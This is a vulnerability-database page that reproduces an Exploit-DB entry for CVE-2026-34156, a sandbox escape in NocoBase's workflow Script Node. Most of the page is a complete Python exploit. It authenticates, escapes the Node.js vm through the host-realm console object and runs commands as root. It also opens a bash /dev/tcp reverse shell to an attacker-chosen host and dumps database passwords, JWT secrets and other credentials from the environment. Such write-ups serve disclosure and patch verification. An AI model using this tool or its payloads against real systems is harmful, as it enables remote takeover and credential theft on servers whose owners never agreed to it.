Lucene search
K

NocoBase 2.0.27 - VM Sandbox Escape

🗓️ 07 May 2026 00:00:00Reported by onurcangencbilkentType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

NocoBase 2.0.27 VM sandbox escape enables remote code execution as root via host console objects.

Related
Code
# Exploit Title: NocoBase  2.0.27 - VM Sandbox Escape 
# Date: 2026-03-26
# Exploit Author: Onurcan Genç
# Vendor Homepage: https://www.nocobase.com/
# Software Link: https://github.com/nocobase/nocobase
# Version: <= 2.0.27 — patched in 2.0.28
# Tested on: Debian GNU/Linux 12 (bookworm) / Docker / Node.js v20.20.1
# CVE: CVE-2026-34156
# Advisory: https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c
# CWE: CWE-913
# CVSS: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
#
# Description:
#   NocoBase's Workflow Script Node executes user-supplied JavaScript inside
#   a Node.js vm sandbox with a custom require allowlist. However, the console
#   object passed into the sandbox exposes host-realm WritableWorkerStdio
#   stream objects (console._stdout / console._stderr). By traversing the
#   prototype chain (.constructor.constructor), an attacker obtains the host
#   realm's Function constructor, accesses the process object, and uses
#   process.mainModule.require to load child_process — bypassing the sandbox
#   and achieving Remote Code Execution as root.
#
# Exploitation chain:
#   console._stdout.constructor.constructor   → host-realm Function
#   Function('return process')()              → Node.js process object
#   process.mainModule.require('child_process') → unrestricted module
#   child_process.execSync('id')              → RCE as root
#
# Usage:
#   python3 exploit.py -t <TARGET> -u <USER> -P <PASS> --cmd "id"
#   python3 exploit.py -t <TARGET> -u <USER> -P <PASS> --dump
#   python3 exploit.py -t <TARGET> -u <USER> -P <PASS> -l <LHOST> -p <LPORT>
#
# Notes:
#   - Requires valid credentials (any user with workflow access)
#   - Vulnerability check runs automatically before exploitation
#   - Default reverse shell uses bash /dev/tcp (Debian-based containers)
#   - Start listener before running: nc -lvnp 4444

import argparse
import json
import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ─── Colors ───────────────────────────────────────────────────────────────────

class C:
    RED     = "\033[91m"
    GREEN   = "\033[92m"
    YELLOW  = "\033[93m"
    BLUE    = "\033[94m"
    MAGENTA = "\033[95m"
    CYAN    = "\033[96m"
    WHITE   = "\033[97m"
    BOLD    = "\033[1m"
    DIM     = "\033[2m"
    RESET   = "\033[0m"

def info(msg):    print(f"  {C.BLUE}[*]{C.RESET} {msg}")
def good(msg):    print(f"  {C.GREEN}[+]{C.RESET} {msg}")
def warn(msg):    print(f"  {C.YELLOW}[!]{C.RESET} {msg}")
def fail(msg):    print(f"  {C.RED}[-]{C.RESET} {msg}")
def result(msg):  print(f"  {C.CYAN}[→]{C.RESET} {msg}")

BANNER = f"""
{C.RED}{C.BOLD}╔══════════════════════════════════════════════════════════════════╗
║  NocoBase Workflow Script Node — VM Sandbox Escape to RCE      ║
║  CVE: [CVE-2026-34156]  |  CVSS: 9.9 Critical                        ║
║  Author: Onurcan Genç                                          ║
╚══════════════════════════════════════════════════════════════════╝{C.RESET}
"""

ESCAPE_CHAIN = (
    "const Fn=console._stdout.constructor.constructor;"
    "const proc=Fn('return process')();"
    "const cp=proc.mainModule.require('child_process');"
)


# ─── Core Functions ───────────────────────────────────────────────────────────

def authenticate(target: str, username: str, password: str, verify_ssl: bool = False) -> str:
    url = f"{target.rstrip('/')}/api/auth:signIn"
    body = {"account": username, "password": password}

    print()
    info(f"Authenticating as {C.BOLD}{username}{C.RESET}...")

    try:
        resp = requests.post(url, headers={"Content-Type": "application/json"},
                             json=body, timeout=10, verify=verify_ssl)
        data = resp.json()
    except requests.exceptions.ConnectionError:
        fail(f"Connection failed: cannot reach {C.YELLOW}{url}{C.RESET}")
        sys.exit(1)
    except json.JSONDecodeError:
        fail(f"Invalid response from server")
        sys.exit(1)

    if "errors" in data:
        msg = data["errors"][0].get("message", "Unknown error")
        fail(f"Authentication failed: {C.RED}{msg}{C.RESET}")
        sys.exit(1)

    token = data.get("data", {}).get("token")
    if not token:
        fail("No token in response")
        sys.exit(1)

    nickname = data.get("data", {}).get("user", {}).get("nickname", "unknown")
    user_id = data.get("data", {}).get("user", {}).get("id", "?")
    good(f"Authenticated! User: {C.GREEN}{C.BOLD}{nickname}{C.RESET} (ID: {user_id})")
    good(f"Token: {C.DIM}{token[:25]}...{token[-10:]}{C.RESET}")
    return token


def send_payload(target: str, token: str, payload: str, verify_ssl: bool = False) -> dict:
    url = f"{target.rstrip('/')}/api/flow_nodes:test"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    body = {
        "type": "script",
        "config": {"content": payload, "timeout": 5000, "arguments": []}
    }

    try:
        resp = requests.post(url, headers=headers, json=body, timeout=10, verify=verify_ssl)
        return resp.json()
    except requests.exceptions.Timeout:
        return {"data": {"status": 1, "result": "timeout (expected for reverse shell)"}}
    except requests.exceptions.ConnectionError as e:
        return {"error": f"Connection failed: {e}"}
    except json.JSONDecodeError:
        return {"error": "Invalid JSON response", "raw": resp.text[:500]}


def verify_vulnerability(target: str, token: str) -> bool:
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 1: Vulnerability Check{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    check_payload = (
        "try {"
        "  const name = console._stdout.constructor.name;"
        "  const fnType = typeof console._stdout.constructor.constructor;"
        "  return JSON.stringify({stream: name, fnConstructor: fnType});"
        "} catch(e) { return 'ERR: ' + e.message; }"
    )
    result_data = send_payload(target, token, check_payload)

    if "error" in result_data:
        fail(f"Connection error: {result_data['error']}")
        return False

    data = result_data.get("data", {})

    if data.get("status") != 1:
        if "INVALID_TOKEN" in str(data) or "EMPTY_TOKEN" in str(data):
            fail("Authentication token is invalid or expired")
        else:
            fail(f"Unexpected response: {data}")
        return False

    try:
        check = json.loads(data.get("result", "{}"))
        stream = check.get("stream", "")
        fn_type = check.get("fnConstructor", "")

        if stream == "WritableWorkerStdio" and fn_type == "function":
            good(f"Host-realm stream object: {C.GREEN}{C.BOLD}{stream}{C.RESET}")
            good(f"Function constructor:     {C.GREEN}{C.BOLD}accessible{C.RESET}")
            print()
            good(f"{C.GREEN}{C.BOLD}TARGET IS VULNERABLE!{C.RESET}")
            return True
        else:
            fail(f"Unexpected sandbox state: stream={stream}, fn={fn_type}")
            return False
    except (json.JSONDecodeError, TypeError):
        res = data.get("result", "")
        fail(f"Check failed: {res}")
        return False


# ─── Exploit Modes ────────────────────────────────────────────────────────────

def exploit_cmd(target: str, token: str, cmd: str):
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 2: Command Execution{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    info(f"Executing: {C.YELLOW}{cmd}{C.RESET}")

    safe_cmd = cmd.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();'
    resp = send_payload(target, token, payload)

    data = resp.get("data", {})
    if data.get("status") == 1:
        output = data.get("result", "")
        print()
        good(f"Output:")
        print(f"  {C.CYAN}{'─' * 55}{C.RESET}")
        for line in output.split("\n"):
            print(f"  {C.WHITE}{line}{C.RESET}")
        print(f"  {C.CYAN}{'─' * 55}{C.RESET}")
    else:
        fail(f"Execution failed: {data}")


def exploit_revshell(target: str, token: str, lhost: str, lport: int):
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 2: Reverse Shell{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    info(f"Target:   {C.YELLOW}{target}{C.RESET}")
    info(f"Callback: {C.GREEN}{C.BOLD}{lhost}:{lport}{C.RESET}")
    warn(f"Ensure listener is running: {C.BOLD}nc -lvnp {lport}{C.RESET}")
    print()

    shell_cmd = f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
    payload = f"{ESCAPE_CHAIN}cp.exec('{shell_cmd}');return 'shell spawned';"
    resp = send_payload(target, token, payload)

    data = resp.get("data", {})
    res = data.get("result", "")

    if "shell spawned" in str(res) or "timeout" in str(res):
        good(f"{C.GREEN}{C.BOLD}Payload delivered! Check your listener.{C.RESET}")
    else:
        fail(f"Unexpected response: {data}")


def exploit_dump(target: str, token: str):
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 2: System & Credential Dump{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    # System info via shell commands
    commands = [
        ("User",        "id"),
        ("Hostname",    "hostname"),
        ("OS",          "cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2"),
        ("Kernel",      "uname -r"),
        ("Node.js",     "node --version"),
        ("Working Dir", "pwd"),
    ]

    print()
    info(f"{C.BOLD}System Information{C.RESET}")
    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    for label, cmd in commands:
        safe_cmd = cmd.replace('"', '\\"')
        payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();'
        resp = send_payload(target, token, payload)
        data = resp.get("data", {})
        if data.get("status") == 1:
            out = data.get("result", "N/A").replace('"', '')
            print(f"  {C.WHITE}{label:.<22}{C.RESET} {C.GREEN}{out}{C.RESET}")

    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    # Credentials via JavaScript
    print()
    info(f"{C.BOLD}Environment Credentials{C.RESET}")
    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    secrets_payload = (
        f"{ESCAPE_CHAIN}"
        "const env = proc.env;"
        "const keys = ['DB_HOST','DB_PORT','DB_DATABASE','DB_USER','DB_PASSWORD',"
        "'DB_DIALECT','INIT_ROOT_USERNAME','INIT_ROOT_PASSWORD','INIT_ROOT_NICKNAME',"
        "'INIT_ROOT_EMAIL','APP_KEY','API_KEY','JWT_SECRET','SECRET_KEY'];"
        "const out = {}; keys.forEach(k => { if(env[k]) out[k] = env[k]; });"
        "return JSON.stringify(out);"
    )
    resp = send_payload(target, token, secrets_payload)
    data = resp.get("data", {})

    if data.get("status") == 1:
        try:
            creds = json.loads(data.get("result", "{}"))
            for k, v in creds.items():
                color = C.RED if "PASS" in k or "SECRET" in k or "KEY" in k else C.YELLOW
                print(f"  {C.WHITE}{k:.<30}{C.RESET} {color}{C.BOLD}{v}{C.RESET}")
        except json.JSONDecodeError:
            result(f"Raw: {data.get('result')}")

    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    # All env vars with sensitive patterns
    print()
    info(f"{C.BOLD}Additional Secrets (pattern match){C.RESET}")
    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    extra_payload = (
        f"{ESCAPE_CHAIN}"
        "const env = proc.env;"
        "const out = {};"
        "for (const k of Object.keys(env)) {"
        "  if (/secret|key|token|pass|auth|jwt|api_key|private/i.test(k) && "
        "      !k.startsWith('npm_')) out[k] = env[k];"
        "}"
        "return JSON.stringify(out);"
    )
    resp = send_payload(target, token, extra_payload)
    data = resp.get("data", {})

    if data.get("status") == 1:
        try:
            extras = json.loads(data.get("result", "{}"))
            if extras:
                for k, v in extras.items():
                    print(f"  {C.WHITE}{k:.<30}{C.RESET} {C.RED}{C.BOLD}{v}{C.RESET}")
            else:
                info("No additional secrets found")
        except json.JSONDecodeError:
            pass

    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")


# ─── Main ─────────────────────────────────────────────────────────────────────

def main():
    print(BANNER)

    parser = argparse.ArgumentParser(
        description="NocoBase Workflow Script Node — VM Sandbox Escape to RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
{C.BOLD}Examples:{C.RESET}
  {C.CYAN}Command:{C.RESET}       %(prog)s -t http://target:13000 -u nocobase -P admin123 --cmd "id"
  {C.CYAN}Dump:{C.RESET}          %(prog)s -t http://target:13000 -u nocobase -P admin123 --dump
  {C.CYAN}Reverse Shell:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 -l 10.10.14.5 -p 4444
        """
    )
    parser.add_argument("-t", "--target", required=True,
                        help="Target NocoBase URL (e.g., http://target:13000)")
    parser.add_argument("-u", "--username", required=True,
                        help="NocoBase username")
    parser.add_argument("-P", "--password", required=True,
                        help="NocoBase password")
    parser.add_argument("-l", "--lhost", default=None,
                        help="Listener IP for reverse shell")
    parser.add_argument("-p", "--lport", type=int, default=4444,
                        help="Listener port (default: 4444)")
    parser.add_argument("--cmd", default=None,
                        help="Execute a single command")
    parser.add_argument("--dump", action="store_true",
                        help="Dump system info and credentials")
    parser.add_argument("--no-verify", action="store_true",
                        help="Skip vulnerability verification")

    args = parser.parse_args()

    if not args.cmd and not args.lhost and not args.dump:
        fail(f"Specify {C.BOLD}--cmd{C.RESET} (command), {C.BOLD}--dump{C.RESET} (info), or {C.BOLD}-l LHOST{C.RESET} (revshell)")
        sys.exit(1)

    # Phase 0: Authenticate
    token = authenticate(args.target, args.username, args.password)

    # Phase 1: Vulnerability check (always runs unless --no-verify)
    if not args.no_verify:
        if not verify_vulnerability(args.target, token):
            fail(f"{C.RED}{C.BOLD}TARGET IS NOT VULNERABLE.{C.RESET} Exiting.")
            sys.exit(1)

    # Phase 2: Exploit
    if args.dump:
        exploit_dump(args.target, token)
    elif args.cmd:
        exploit_cmd(args.target, token, args.cmd)
    else:
        exploit_revshell(args.target, token, args.lhost, args.lport)

    print()
    print(f"  {C.GREEN}{C.BOLD}Done.{C.RESET}")
    print()


if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation